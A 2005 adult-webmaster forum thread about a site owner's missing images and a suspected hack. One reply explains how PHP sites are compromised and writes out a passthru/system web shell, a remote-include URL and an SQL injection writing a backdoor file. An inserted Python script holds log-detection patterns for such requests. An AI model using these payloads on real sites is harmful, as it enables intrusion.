Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

Old 08-02-2005, 01:34 AM   #1
Paul Markham
Too old to care
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
We got hacked.

Well we think it's the only way the problem on the site could have happened.

A few weeks ago images started to disappear and at first I thought it was the webmaster responsible for the content slipping up. But over the weekend I noticed it was getting far worse and in every set we're missing 5 to 10 images.

So we are in the process of reloading the entire site, a nightmare job and will be down for at least another day. It's not just the reloading but also the creating of new catalogued pictures that are missing.

Was in the office until 1.00 last night working at it.

Thanks to Bailey at www.sapphicerotica.com for helping us out and letting us use his connection for uploading, it's faster than ours.
Old 08-02-2005, 01:37 AM   #2
CaptainHowdy
Too lazy to set a custom title
Join Date: Dec 2004
Location: Happy in the dark.
Posts: 93,652
Fuckersssss!! i hope things get back to normal asap !!
Old 08-02-2005, 01:37 AM   #3
mrthumbs
salad tossing sig guy
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..
Old 08-02-2005, 01:38 AM   #4
mrthumbs
salad tossing sig guy
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
I bet they have an elite cr3w of hackers each responsible for the pic assigned to him/her. They work globally you know.
Old 08-02-2005, 01:40 AM   #5
mrthumbs
salad tossing sig guy
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
they probably discussed and planned this attack months in advance on some underground IRC channel. Or maybe a convention.

You should write a book about the vicious attack.
Old 08-02-2005, 01:42 AM   #6
mrthumbs
salad tossing sig guy
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
Maybe they also got access to your GFY account.

WARNING TO ALL READERS

Don't give out passwords in this thread if Charly asks for it.. it could be the hacker social engineering.
Old 08-02-2005, 01:44 AM   #7
Paul Markham
Too old to care
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
Quote:
Originally Posted by mrthumbs
yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..
So what do you suggest has gone wrong, we've looked at it over and over and can't find anything wrong.

But yes I do see it as strange they would take out random images.
Old 08-02-2005, 01:45 AM   #8
mrthumbs
salad tossing sig guy
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
Quote:
Originally Posted by charly
So what do you suggest has gone wrong, we've looked at it over and over and can't find anything wrong.

But yes I do see it as strange they would take out random images.
Just fucking with you.. probably some human error.. is it a dedicated machine?
How is it updated?

Anyway..


http://www.paulmarkham.com/all-adult-content.php
Old 08-02-2005, 01:45 AM   #9
Repetitive Monkey
Confirmed User
Join Date: Feb 2004
Posts: 3,505
You need to stop using you know what as the password for everything, I've told you before on two separate occasions.
Old 08-02-2005, 02:06 AM   #10
Paul Markham
Too old to care
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
Quote:
Originally Posted by Repetitive Monkey
You need to stop using you know what as the password for everything, I've told you before on two separate occasions.
The database does not have "You know what" as a password. Would not use the one on the boards for the database.

And all the updated and changed.

Yes the server is dedicated and all the image content is on one disc which is again protected, but with FTP access this might have given someone access.

The site is updated as we add new content which is a full time operation. Well nearly.
Old 08-02-2005, 02:06 AM   #11
fris
Too lazy to set a custom title
Join Date: Aug 2002
Posts: 55,372
first mistake is not to announce that you got hacked.



things you keep hush hush
Old 08-02-2005, 02:22 AM   #12
Paul Markham
Too old to care
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
Quote:
Originally Posted by fris
first mistake is not to announce that you got hacked.



things you keep hush hush
OK the sites are down for routine maintenance.
Old 08-02-2005, 02:45 AM   #13
V_RocKs
Damn Right I Kiss Ass!
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,421
Put it back up and I'll tell ya how they did it...

Since you use PHP we will start with some basics...

Either 1, you use templates and they were able to use one of their own:

http://www.paulmarkham.com/all-adult....php?p=contact

Which in code is,
Code:
include($p);
Which means they:

http://www.paulmarkham.com/all-adult...php%3fcmd=Your Unix Command Here

In the file they included was:
Code:
if ($cmd != '') { passthru($cmd); }
Or you are not removing crap that can be sent to the DB so:

http://www.paulmarkham.com/all-adult....php?girl=sara

Becomes:

Code:
http://www.paulmarkham.com/all-adult-content.php?'<? system($cmd); ?>' INTO DUMPFILE '/path/to/website/backdoor.php'--
Of course that would be really simplistic since it would assume that your coder is a complete asshat.

Or it could just be that you have an unpatched version of awstats, phpbb or some other form of free software installed.
Old 08-02-2005, 02:57 AM   #14
darksoul
Confirmed User
Join Date: Apr 2002
Location: /root/
Posts: 4,997
are you sure your hdd is fine ?
a corrupted harddisk would cause this.
Old 08-02-2005, 03:04 AM   #15
Machete_
WINNING!
Join Date: Oct 2002
Posts: 14,579
look at the log files on the server, search for the filename missing, and se who last used or moved it
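The log search suggested in post #15, narrowed to the request shapes V_RocKs describes in post #13, as an added example that is not part of the thread. The log format (Apache combined), the sample lines and the rule names are assumptions made for illustration.

```python
import re
from typing import List, NamedTuple
from urllib.parse import unquote_plus, urlsplit

# Constructed sample in Apache combined log format. Hosts, paths and payloads are
# placeholders shaped like the requests quoted in post #13, not real log data.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Aug/2005:10:00:01 +0000] "GET /page.php?p=contact HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
192.0.2.77 - - [01/Aug/2005:10:02:13 +0000] "GET /page.php?p=http://host.invalid/t.txt%3fcmd=COMMAND HTTP/1.1" 200 311 "-" "Wget/1.9"
192.0.2.77 - - [01/Aug/2005:10:03:40 +0000] "GET /page.php?girl=sara'%20INTO%20DUMPFILE%20'/path/to/website/backdoor.php'-- HTTP/1.1" 200 87 "-" "Wget/1.9"
192.0.2.10 - - [01/Aug/2005:10:05:00 +0000] "GET /page.php?girl=sara HTTP/1.1" 200 4800 "-" "Mozilla/4.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Rule names are this example's own; each pattern runs on the decoded query string.
RULES = [
    ("remote-url-in-parameter", re.compile(r"=\s*(?:https?|ftp)://", re.I)),
    ("command-parameter", re.compile(r"(?:^|[?&])cmd=", re.I)),
    ("sql-file-write", re.compile(r"\bINTO\s+(?:DUMP|OUT)FILE\b", re.I)),
]

class Finding(NamedTuple):
    ip: str
    ts: str
    status: int
    target: str
    rules: List[str]

def decode_query(raw: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%253f) are still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def triage(log_text: str) -> List[Finding]:
    """Return one Finding per request whose decoded query matches any rule."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        query = decode_query(urlsplit(m["target"]).query)
        hits = [name for name, rx in RULES if rx.search(query)]
        if hits:
            findings.append(
                Finding(m["ip"], m["ts"], int(m["status"]), m["target"], hits))
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f.ts, f.ip, f.status, ",".join(f.rules), f.target)
```

A hit with status 200 only shows that the request was served; whether the include or the query actually ran has to be confirmed from the PHP source and the files on disk.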
Old 08-02-2005, 03:09 AM   #16
More Booze
Confirmed User
Join Date: Mar 2004
Posts: 5,116
Quote:
Originally Posted by mrthumbs
Just fucking with you.. probably some human error.. is it a dedicated machine?
How is it updated?

Anyway..


http://www.paulmarkham.com/all-adult-content.php
Whats up with all the sarcasm? It could be some script or something the "hacker" left on the server.. :P
Old 08-02-2005, 03:12 AM   #17
broke
Confirmed User
Join Date: Aug 2003
Location: Someplace Windy
Posts: 4,501
Quote:
Originally Posted by ebus_dk
look at the log files on the server, search for the filename missing, and se who last used or moved it
HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?
Old 08-02-2005, 03:15 AM   #18
Machete_
WINNING!
Join Date: Oct 2002
Posts: 14,579
Quote:
Originally Posted by broke
HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?
I faild to se the humor in that
Old 08-02-2005, 03:22 AM   #19
More Booze
Confirmed User
Join Date: Mar 2004
Posts: 5,116
Quote:
Originally Posted by broke
HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?
Ummmmm. His serveradmin might do it for him.
Old 08-02-2005, 03:24 AM   #20
beemk
CLICK HERE
Join Date: Jan 2002
Posts: 20,829
Quote:
Originally Posted by mrthumbs
yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..
Old 08-02-2005, 03:26 AM   #21
broke
Confirmed User
Join Date: Aug 2003
Location: Someplace Windy
Posts: 4,501
Quote:
Originally Posted by ebus_dk
I faild to se the humor in that
Is your E key stuck or just plain broken?
Old 08-02-2005, 03:26 AM   #22
fris
Too lazy to set a custom title
Join Date: Aug 2002
Posts: 55,372
insecure php code rocks.
Old 08-02-2005, 03:30 AM   #23
Paul Markham
Too old to care
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
Quote:
Originally Posted by darksoul
are you sure your hdd is fine ?
a corrupted harddisk would cause this.
I'm assuming ISPRIME checked that when we asked them about the problem, but will get onto them and make sure, thanks for the suggestion.

V_RocKs thanks for the programming, all double Dutch to me but I have a guy here who knows about these things.

Quote:
look at the log files on the server, search for the filename missing, and se who last used or moved it
We did that and it was no help.

Last edited by charly; 08-02-2005 at 03:32 AM..
Old 08-02-2005, 04:02 AM   #24
Trafficbrokercom
Confirmed User
Join Date: Dec 2002
Posts: 542
first thing to do is to check /tmp for hidden shellkits ..

so you are uploading the content onto the compromised server again?

don't you want to find the security hole first , make a fresh installation and try everything to avoid this happening in the future?

make sure to set allow_url_fopen = Off in your php.ini
Old 08-02-2005, 04:06 AM   #25
DutchTeenCash
I like Dutch Girls
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
So whats up with daily backups?
Old 08-02-2005, 04:11 AM   #26
riddler
Confirmed User
Join Date: Oct 2004
Location: up in gang bang heaven
Posts: 3,726
sounds more like a failing harddrive than a hacker, Hackers usually don't fuck with people they just go in for the kill and get it over with, Sounds like it's hitting bad clusters or the file system is corrupted..
Old 08-02-2005, 04:15 AM   #27
Machete_
WINNING!
Join Date: Oct 2002
Posts: 14,579
Quote:
Originally Posted by riddler
sounds more like a failing harddrive than a hacker, Hackers usually don't fuck with people they just go in for the kill and get it over with, Sounds like it's hitting bad clusters or the file system is corrupted..
yep. or a failing raidcontroller
Try to run a RAID consistency test

Last edited by Machete_; 08-02-2005 at 04:16 AM..
Old 08-02-2005, 04:21 AM   #28
Roald
SecretFriends.com
Join Date: May 2001
Location: IMC Headquarters
Posts: 27,889
Doesn't sound like a hacker to me but more like a failure in your system.

Btw make sure to make backups daily from now on ;)))
Old 08-02-2005, 04:26 AM   #29
broke
Confirmed User
Join Date: Aug 2003
Location: Someplace Windy
Posts: 4,501
Quote:
Originally Posted by ebus_dk
yep. or a failing raidcontroller
Try to run a RAID consistency test
Don't know Paul/Charly's set up, but I doubt his webserver has an array. Those controllers can be problematic on Compaq/HP servers, though. God can they be problematic.

Who knows...

Sounds like a disk issue to me, though.

Last edited by broke; 08-02-2005 at 04:27 AM..
Old 08-02-2005, 04:46 AM   #30
Violetta
Affiliate
Join Date: Jul 2004
Posts: 28,735
Quote:
Originally Posted by darksoul
are you sure your hdd is fine ?
a corrupted harddisk would cause this.
It could. What OS do you run?
Old 08-02-2005, 04:49 AM   #31
mikeyddddd
Viva la vulva!
Join Date: Mar 2003
Location: you can't please everyone, so you got to please yourself
Posts: 16,557
Have you let Lee help you with any problems recently?
Old 08-02-2005, 05:17 AM   #32
Rui
web
Join Date: Dec 2001
Location: On icq: 85-483-060
Posts: 9,533
bummer, hope you find how they got in, secure the site and if possible nail the bastards (asking too much)
Old 08-02-2005, 05:30 AM   #33
pussyluver
Clueless OleMan
Join Date: Mar 2003
Location: ICQ - 169903487
Posts: 11,009
nothing better for conversions, traffic, and bookmarks than to have a site down for a day or more
Old 08-02-2005, 05:48 AM   #34
Machete_
WINNING!
Join Date: Oct 2002
Posts: 14,579
Quote:
Originally Posted by broke
Don't know Paul/Charly's set up, but I doubt his webserver has an array. Those controllers can be problematic on Compaq/HP servers, though. God can they be problematic.

Who knows...

Sounds like a disk issue to me, though.

The old Compaq smartarrayII version 2.. GOD dam they fucked the systems..
We had more than 30 proliant800 placed in danish banks

There were new softpaq's to them every month
Old 08-02-2005, 05:52 AM   #35
DutchTeenCash
I like Dutch Girls
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
Quote:
Originally Posted by ebus_dk

The old Compaq smartarrayII version 2.. GOD dam they fucked the systems..
We had more than 30 proliant800 placed in danish banks

There were new softpaq's to them every month
we had them too in the company where I used to work BIG issues, our own are dells now fine and with daily backups you cant go wrong